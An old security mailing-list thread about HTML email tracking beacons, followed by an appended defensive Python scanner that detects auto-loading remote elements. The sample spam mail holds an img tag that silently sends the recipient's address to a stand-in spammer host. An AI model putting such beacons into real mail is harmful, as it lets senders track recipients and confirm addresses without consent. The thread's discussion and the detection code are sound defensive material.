Re: spam technique name?
From: Bill Burge (bill burge.com)
Date: Tue Apr 22 2003 - 12:17:30 CDT
This is already very common...
Sadly, the place that pays my bills uses this sort of thing in all customer mail.
bb
*********** REPLY SEPARATOR ***********
On 4/22/2003 at 12:06 PM Calderon, Juan C (CORP, DDEMESIS) wrote:
>Hello all
>
>Recently I was thinking about a technique that could be used by spammers,
>I don't know a common name or something for such a technique, so if you
>know it please let me know.
>
>PROBLEM
> How can a spammer know if the victim opened the mail? One is the well-known
>"Remove Me" link which, in fact, will confirm the user read the message
>(and probably will be bombed with many more, now that he said "hey!, I'm
>here"). However, it requires user interaction.
>
>SOLUTION
> A simple "solution" can be to insert an Image, Link (for CSS for example)
>or Script tag in the HTML mail; all those elements tell Web browsers
>to send a GET request using the SRC or HREF attribute, without user
>interaction.
>
>Sample Code (Mail sent to fictitious peter foomail.com)
><HTML>
><BODY>
> Dear Peter<br>
> Buy our brand new product, CHEAP, CHEAP, CHEAP....
> <img
>src='http://www.spamer.com/AutoRecordAddress.php?email=peter%40foomail%2Ecom'><br>
> Click <a href='http://www.spamer.com/ConfirmVictim.php'>Here</a> to be
>removed<br>
> NOTE: the presence of this link indicates this is not spamming even if you
>don't ask for this email
></BODY>
></HTML>
>
>Viewing (or "previewing" in Outlook or similar) this email will
>automatically send a request for an "image" file served by a server-side
>script, first recording the data without explicit authorization.
>
>I've tested this (using 3 different tags) using Exchange and some other
>public accounts. I succeeded in all cases.
>
>So have you seen something similar? Do you think this is a kind of XSS? I
>do.
>
>cheers :)
>________________________________________
>Juan C Calderon
>IT Security
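An added example, not from either poster: a defender-side scanner that parses an HTML mail body the way the message above describes and reports every element a mail client would fetch automatically (IMG, SCRIPT, LINK, IFRAME), flagging those whose query string carries an address, which is the beacon pattern in the sample. The `<a>` link is deliberately not counted, since it needs a click. The sample mail, host names and addresses are constructed for the demo.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Elements whose attribute a renderer fetches automatically, without a click.
AUTO_FETCH = {"img": "src", "script": "src", "link": "href", "iframe": "src"}

class BeaconScanner(HTMLParser):
    """Records every remote resource an HTML mail body would auto-load."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attr_name = AUTO_FETCH.get(tag)  # HTMLParser lowercases tag names
        url = dict(attrs).get(attr_name) if attr_name else None
        if not url:
            return
        parsed = urlparse(url.strip())
        if parsed.scheme not in ("http", "https"):
            return  # cid:/data: references never leave the mailbox
        # parse_qs percent-decodes, so email=peter%40foomail%2Ecom shows its "@".
        values = [v for vals in parse_qs(parsed.query).values() for v in vals]
        self.findings.append({
            "tag": tag,
            "host": parsed.hostname,
            "leaks_address": any("@" in v for v in values),
        })

def scan_html_mail(body):
    """Return the auto-fetching remote elements found in an HTML mail body."""
    scanner = BeaconScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings

def should_block_remote_content(body):
    """Policy a mail client might apply: block remote loads if any are present."""
    return bool(scan_html_mail(body))

# Constructed sample mirroring the post's example (hypothetical host and address).
SAMPLE_MAIL = """<HTML><HEAD>
<link rel='stylesheet' href='http://www.spamer.com/style.css'>
</HEAD><BODY>
Dear Peter<br>
<img src='http://www.spamer.com/AutoRecordAddress.php?email=peter%40foomail%2Ecom'><br>
Click <a href='http://www.spamer.com/ConfirmVictim.php'>Here</a> to be removed<br>
</BODY></HTML>"""

if __name__ == "__main__":
    for finding in scan_html_mail(SAMPLE_MAIL):
        print(finding)
```

Running it lists the stylesheet LINK (no address in the query) and the IMG beacon (address present); the removal link is not reported.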